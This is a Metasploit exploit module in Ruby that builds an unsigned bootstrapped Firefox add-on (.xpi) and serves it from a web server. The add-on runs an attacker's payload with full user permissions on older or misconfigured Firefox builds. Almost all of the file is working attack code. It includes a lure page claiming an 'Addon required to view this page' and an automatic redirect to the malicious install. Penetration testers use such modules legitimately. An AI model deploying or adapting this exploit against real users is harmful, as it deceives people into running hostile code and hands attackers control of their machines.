1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/zip'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ExcellentRanking
10

11
  include Msf::Exploit::Remote::HttpServer::HTML
12
  include Msf::Exploit::Remote::FirefoxAddonGenerator
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
19
        'Description' => %q{
20
          Mozilla Firefox before version 41 allowed users to install
21
          unsigned browser extensions from arbitrary web servers.
22

23
          This module dynamically creates an unsigned .xpi addon file.
24
          The resulting bootstrapped Firefox addon is presented to
25
          the victim via a web page. The victim's Firefox browser
26
          will pop a dialog asking if they trust the addon.
27

28
          Once the user clicks "install", the addon is installed and
29
          executes the payload with full user permissions. As of Firefox
30
          4, this will work without a restart as the addon is marked to
31
          be "bootstrapped". As the addon will execute the payload after
32
          each Firefox restart, an option can be given to automatically
33
          uninstall the addon once the payload has been executed.
34

35
          As of Firefox 41, unsigned extensions can still be installed
36
          on Firefox Nightly, Unbranded and Development builds when
37
          configured with `xpinstall.signatures.required` set to `false`.
38

39
          Note: this module generates legacy extensions which are
40
          supported only in Firefox before version 57.
41
        },
42
        'License' => MSF_LICENSE,
43
        'Author' => [ 'mihi', 'joev' ],
44
        'DisclosureDate' => '2007-06-27',
45
        'References' => [
46
          [ 'URL', 'https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/' ],
47
          [ 'URL', 'https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/' ],
48
          [ 'URL', 'https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon' ],
49
          [ 'URL', 'https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions' ],
50
          [ 'URL', 'https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
51
        ],
52
        'Notes' => {
53
          'Reliability' => [REPEATABLE_SESSION],
54
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
55
          'Stability' => [CRASH_SAFE]
56
        }
57
      )
58
    )
59
  end
60

61
  def on_request_uri(cli, request)
62
    if request.uri.match(/\.xpi$/i)
63
      # browser has navigated to the .xpi file
64
      print_status("Sending xpi and waiting for user to click 'accept'...")
65
      if not xpi = generate_addon_xpi(cli)
66
        print_error("Failed to generate the payload.")
67
        send_not_found(cli)
68
      else
69
        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
70
      end
71
    else
72
      # initial browser request
73
      # force the user to access a directory-like URL
74
      if not request.uri.match(/\/$/)
75
        print_status("Redirecting request.")
76
        send_redirect(cli, "#{get_resource}/")
77
      else
78
        # user has navigated
79
        print_status("Sending HTML response.")
80
        send_response_html(cli, generate_html)
81
      end
82
    end
83

84
    handler(cli)
85
  end
86

87
  def generate_html
88
    html = %Q|<html><head><title>Loading, Please Wait...</title>\n|
89
    html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|
90
    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
91
    html << %Q|</body></html>|
92
    return html
93
  end
94
end
95

96